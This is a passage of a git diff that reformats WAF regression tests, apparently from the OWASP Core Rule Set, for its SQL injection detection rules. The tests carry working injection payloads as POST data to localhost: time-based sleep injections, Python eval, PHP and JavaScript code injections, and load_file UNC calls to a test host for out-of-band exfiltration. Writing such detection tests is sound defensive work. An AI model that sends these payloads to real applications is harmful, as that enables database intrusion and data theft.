text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "tempdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "msdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "mysql.db" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "MSysAccessObjects" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SCHEMA_NAME" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DATABASE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "schema_name" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_id: 17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "information_schema" - version: HTTP/1.0 - output: - log_contains: id "942140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index c13060656..82e83cec0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -2,328 +2,308 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942150.yaml +rule_id: 942150 tests: - - test_title: 942150-1 + - test_id: 1 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 7 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 8 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 9 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 10 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 11 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 12 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 13 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 14 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 15 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 16 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\foobar.txt\" or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 17 desc: "SQLite 'json' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 18 desc: "SQLite 'json_valid' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_id: 19 desc: "SQLite 'glob' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" - version: HTTP/1.0 - output: - log_contains: id "942150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log_contains: id "942150" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index 1b938cf32..baff15efd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -2,189 +2,177 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942151.yaml +rule_id: 942151 tests: - - test_title: 942151-1 + - test_id: 1 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 3 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=, FIND_IN_SET('22', Category )" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - 